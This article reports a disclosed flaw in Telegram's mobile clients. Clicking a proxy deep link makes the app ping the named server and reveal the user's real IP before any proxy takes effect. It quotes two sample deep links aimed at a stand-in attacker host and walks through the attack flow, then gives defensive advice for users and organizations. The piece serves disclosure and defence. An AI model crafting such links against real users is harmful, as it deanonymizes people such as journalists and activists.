This is not a simple bug. This is an architectural flaw built into the client's core logic. Telegram validates proxy server connectivity before routing traffic through it. In this gap, the app leaks your real IP address. A single click on a fake proxy link is enough. Even if you've configured another proxy or think you're protected, the diagnostic ping goes out unencrypted. And given how long this has existed, it's no surprise to the developers.
What Happened
On January 10, 2026, security researchers GangExposed RU and 0x6rss disclosed details of a critical vulnerability in the official Telegram clients for Android and iOS. The essence is straightforward: an attacker can harvest real IP addresses from users who simply click on a tg://proxy or tg://mtproto link. This isn't account compromise or message interception. It's targeted deanonymization at the network level, happening faster than the user can confirm the settings.
BleepingComputer and CyberInsider obtained statements from Telegram. The company acknowledged the behavior but downplayed the severity, claiming that "any website sees your IP when you visit it." Technically true-but a misdirection. The user clicks on a tool for circumvention and anonymity, yet instead sends an unencrypted network request directly to the attacker.
How the Leak Works
The attack starts with a deep link. The attacker crafts a URL like:tg://proxy?server=attacker.com&port=1234&secret=1234567890abcdef
Or for MTProto:
tg://mtproto?server=attacker.com&port=1234&secret=secret
Such a link is easily hidden in post text, disguised as a "Quick Proxy Connect" button, or embedded in hyperlinks. The user sees a familiar interface and clicks, expecting a settings dialog. The dialog appears-but first, Telegram runs an automatic connectivity check.
Here's the problem. During this check, the client sends a diagnostic "ping" to the specified server using the device's real IP address. Even if another proxy is already active in the app, Telegram initiates a direct connection for testing the new server. The app essentially says: "Let me verify this server is alive, then I'll offer to enable it." But the verification has already deanonymized you.
Typical Attack Flow:
- User clicks
tg://proxy link - Telegram displays "Checking connection..."
- Ping travels to
attacker.comusing user's real IP - User sees "Connection available" and taps "Enable"
- The leak has already occurred
The attacker simply logs incoming connections. On their server, this appears as a list of IP addresses with precise timestamps.
Researcher 0x6rss compared this mechanic to NTLM relay attacks in Windows: the system automatically sends a password hash when accessing a resource. Here, the client "leaks" the IP before enabling protection. Trust in the interface plus automated actions lead to compromise before the barrier activates.
Why This Is More Dangerous Than It Appears
An IP address in 2026 is not just numbers. It's geolocation (often accurate to the neighborhood), ISP identification, and in corporate networks, the workplace. For journalists and activists in countries with severe censorship, such a leak undermines the entire concept of securely accessing Telegram through a proxy.
The second threat layer is correlation. If a user clicks on fake links multiple times at different moments, the attacker builds a timeline of activity: when the person is online, how frequently they switch networks (home/mobile/work). This data easily correlates with public activity in chats and channels, turning an abstract IP into a profile of a specific individual.
Especially concerning: this appears to be legacy code. The MTProxy protocol was deployed in 2016. If the validation logic hasn't changed, the vulnerability may have existed for years. The reasoning is clear: Telegram wanted convenience (UX), showing proxy availability instantly, but sacrificed security. A fix requires architectural rework-either removing pre-connection validation or routing test traffic through an already-active tunnel.
Информация
Telegram promised to add warnings for proxy links in the next version and require explicit confirmation before connection testing. However, the company did not assign a CVE number and did not provide a patch timeline.
What You Should Do
For users:
- Don't click on proxy links from unknown sources. Even if they appear to be regular @username mentions or buttons, treat them as potential trackers.
- Check your active proxies:
Settings → Privacy and Security → Connection Type → Use Custom Proxy. Remove anything you didn't add yourself. - Don't share proxy links with others unless you're certain they're from a legitimate source.
- Use system-level VPN. If anonymity matters to you, a VPN at the OS level will wrap even these "parasitic" requests in an encrypted tunnel that Telegram cannot bypass.
For organizations:
- If Telegram is used for sensitive communications, disable proxy link functionality via MDM/EMM policies.
- Do not rely on Telegram's built-in proxy as your primary anonymization tool.
- Require employees to use corporate VPN before accessing Telegram.
Our Verdict: Telegram Doesn't Take This Seriously
Telegram has known for years that its built-in proxy is fundamentally unsafe. The company hasn't redesigned the architecture, hasn't issued a CVE, and hasn't set a patch deadline.
Instead:
- "We'll add a warning" (UX fix, not a security fix)
- Downplaying ("any website sees your IP anyway")
- No CVE number (meaning they don't consider it critical)
The bottom line: Telegram's built-in proxy is a censorship circumvention tool, not an anonymization tool. If your safety depends on hiding your IP, don't click proxy links in chats and channels. For genuine protection, use a system-level VPN. Telegram should have fixed this when MTProxy was introduced. They didn't.
